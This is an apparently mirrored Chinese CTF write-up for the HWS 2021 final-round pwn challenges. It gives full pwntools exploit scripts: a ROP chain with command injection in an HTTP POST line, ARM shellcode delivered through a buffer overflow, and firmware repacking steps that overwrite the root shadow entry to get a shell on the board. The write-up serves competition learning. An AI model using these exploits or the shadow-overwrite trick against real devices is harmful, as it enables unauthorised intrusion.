3

HWS 2021 结营赛 Pwn

 2 years ago
source link: https://xuanxuanblingbling.github.io/ctf/pwn/2021/03/06/hws/
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
neoserver,ios ssh client

HWS 2021 结营赛 Pwn

发表于 2021-03-06

| 分类于 CTF/Pwn

更新中…结营赛还有非常多值得探索的东西

Pwn1: easyserver

串口看输出

from pwn import *
#context.log_level = 'debug'

p = remote('20.21.2.27', 59816)

pop_r0_pc = 0x0006099c
cmd_base = 0x008ACE4
system = 0x00019158

cmd = 'cat /tmp/207775d1ee9b9efa245fd9fb6fc03b68/flag'
payload  = 'POST ./ HTTP1.1;'+cmd+'; \r\n'
payload += 'a'*1100+p32(pop_r0_pc)+ p32(cmd_base+13) + p32(system) +cyclic(100)+'\r\n'+'\r\n'+'\r\n'
print payload

p.send(payload)
p.interactive()

Pwn3: babyhttpd

串口看输出

from pwn import *
#context.log_level = 'debug'
context(arch='arm')

# shellcode  = asm('''
# add   r4, pc, #56
# str   r4, [sp, #8]
# sub   r2, r2, r2 
# strb  r2, [r4, #4] 

# sub   r2, r2, r2       
# add   r3, pc, #28      
# str   r3, [sp, #4]     
# str   r2, [sp, #12]     
# mov   r0, r3, lsl r2   
# strb  r2, [r3, #7]     
# add   r3, pc, #4       
# add   r1, sp, #4       
# strb  r2, [r3, #1]     
# swi   0x90ff0b         
# ''')+'/bin/ls//tmp'


shellcode  = asm('''
add   r4, pc, #60
str   r4, [sp, #8]
sub   r2, r2, r2 
strb  r2, [r4, #25] 

sub   r2, r2, r2       
add   r3, pc, #28      
str   r3, [sp, #4]     
str   r2, [sp, #12]     
mov   r0, r3, lsl r2   
strb  r2, [r3, #8]     
add   r3, pc, #4       
add   r1, sp, #4       
strb  r2, [r3, #1]     
swi   0x90ff0b         
''')+'/bin/cat/////tmp/ffffffllllaaaaaagggg'

p = remote('20.21.2.27', 5000)

payload  = 'POST /'+"\x11"*6+shellcode+'\r\n\r\n'
payload += 'name='+'a'*655+p32(0x22504)+'&bbb=./;'

p.send(payload)
p.interactive()

板子拿shell

jffs2解包

# Install jefferson to extract JFFS2 file systems
$ sudo pip install cstruct
$ git clone https://github.com/sviehb/jefferson
$ (cd jefferson && sudo python setup.py install)

binwalk -Me test.img

jffs2打包

sudo apt install mtd-utils
mkfs.jffs2 -r rootfs -o rootfs.img

修改start.sh

#!/bin/sh
cp -r /etc /tmp/
echo 'root:$1$NqxdI63c$nzvMkcJxzktGW6Tsgw3jb0:1::::::' > /tmp/etc/shadow
mount -o loop /tmp/etc/ /etc

report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK